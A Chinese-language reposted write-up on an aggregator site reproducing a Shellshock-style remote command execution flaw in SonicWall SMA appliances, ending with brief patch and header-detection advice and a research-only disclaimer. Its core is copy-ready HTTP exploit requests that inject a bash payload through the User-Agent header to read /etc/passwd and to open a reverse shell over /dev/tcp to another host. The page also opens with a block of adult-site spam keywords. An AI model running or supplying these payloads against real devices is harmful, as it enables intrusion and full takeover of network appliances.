日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

SonicWall远程命令执行漏洞

發布時間:2023/12/31 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SonicWall远程命令执行漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?

SonicWall 遠程命令執行漏洞

一、漏洞描述

?

SonicWall歷史版本遠程命令執行漏洞以及相關利用腳本。由于SonicWall 使用了舊版本內核以及HTTP CGI 可執行程序,攻擊者可構造惡意其HTTP請求頭,造成遠程任意命令執行,并獲得主機控制權限

二、漏洞復現

exp:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close

訪問執行查看:cat /etc/passwd

執行反彈shell

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080? User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close

成功獲取到shell:

簡單的腳本嘗試驗證:

三、防護修補建議

通用修補建議

升級到?Sonic SMA 8.0.0.4

臨時修補建議

針對 http header 進行檢測

可能存在的特征字符串如下() { :; };

?

參考:

?https://my.oschina.net/u/4600927/blog/4927559

免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。

訂閱查看更多復現文章、學習筆記

thelostworld

安全路上,與你并肩前行!!!!

個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

個人簡書:https://www.jianshu.com/u/bf0e38a8d400

個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

個人博客園:https://www.cnblogs.com/thelostworld/

FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article

歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”

?

總結

以上是生活随笔為你收集整理的SonicWall远程命令执行漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。